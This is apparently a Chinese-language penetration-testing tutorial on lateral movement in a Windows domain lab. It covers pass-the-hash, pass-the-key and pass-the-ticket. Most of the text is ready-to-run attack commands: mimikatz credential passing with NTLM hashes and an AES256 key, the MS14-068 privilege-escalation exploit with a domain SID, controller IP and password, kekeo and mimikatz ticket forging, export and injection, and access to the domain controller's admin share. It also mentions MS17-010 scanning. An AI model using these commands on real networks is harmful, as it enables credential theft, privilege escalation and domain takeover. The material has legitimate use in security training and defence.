内网安全-域横向PTHPTKPTT哈希票据传递

PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试
PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试

pth：没打补丁用户都可以连接，打了补丁只能 administrator 连接
ptk：打了补丁才能用户都可以连接，采用 aes256 连接

案例 1-域横向移动 PTH 传递-mimikatz

PTH ntlm 传递

未打补丁下的工作组及域连接：
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
\\OWA2010CN-God.god.org

mimikatz查询出本机NTLM后，通过本机的NTLM值连接域内其它主机（如果设置的密码相同，即可连上）
执行后，弹出一个cmd窗口，可输入对应要连接主机的ip，连接并执行命令（可对内网存活主机的ip依次进行测试）

案例 2-域横向移动 PTK 传递-mimikatz

对方主机必须打了补丁，用户才可连接
通过mimikatz获取aes256值后，进行连接

PTK aes256 传递
打补丁后的工作组及域连接：
sekurlsa::ekeys #获取 aessekurlsa::pth /user:mary /domain:god
/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

案例 3-域横向移动 PTT 传递-ms14068&kekeo&本地

#PTT 攻击的部分就不是简单的 NTLM 认证了，它是利用 Kerberos 协议进行攻击的，这里就介绍三种
常见的攻击方法：MS14-068，Golden ticket，SILVER ticket，简单来说就是将连接合法的票据注入到
内存中实现连接。
MS14-068 基于漏洞，Golden ticket(黄金票据)，SILVER ticket(白银票据)
其中 Golden ticket(黄金票据)，SILVER ticket(白银票据)属于权限维持技术
MS14-068 造成的危害是允许域内任何一个普通用户，将自己提升至域管权限。微软给出的补丁是
kb3011780

第一种利用漏洞：

能实现普通用户直接获取域控 system 权限


#MS14-068 powershell 执行
1.查看当前 sid whoami/user2.mimikatz # kerberos::purge
清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list  查看当前机器凭证
mimikatz # kerberos::ptc 票据文件  将票据注入到内存中3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#454.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit5.查看凭证列表 klist6.利用
dir \\192.168.3.21\c$

当获取到并连接域中的一个普通用户时，获取本地sid值

MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
通过MS14-068执行后会生成一个TGT开头的文件（票据）

通过mimikaze将生成的票据注入到内存中，可通过klist命令查看

查看域控制器名字，直接进行连接

第二种利用工具 kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用 net use 载入
dir \\192.168.3.21\c$

运行kekeo执行命令后生成一个kirbi后缀文件

导入生成的kirbi文件票据，导入后直接连接

第三种利用本地票据(需管理权限)

利用mimikatz导出以前建立连接过的票据
再把以前连接过的票据重新导入，去连接尝试sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi

导出以前建立过连接的票据

将导出的票据重新导入，尝试连接

总结：ptt 传递不需本地管理员权限，连接时主机名连接，基于漏洞,工具,本地票据

案例 4-国产 Ladon 内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

扫描在线主机

检测网段中是否存在ms17010漏洞

扫描网段中是否开发445端口，可以进行smbscan的连接

连接192.168.3.21主机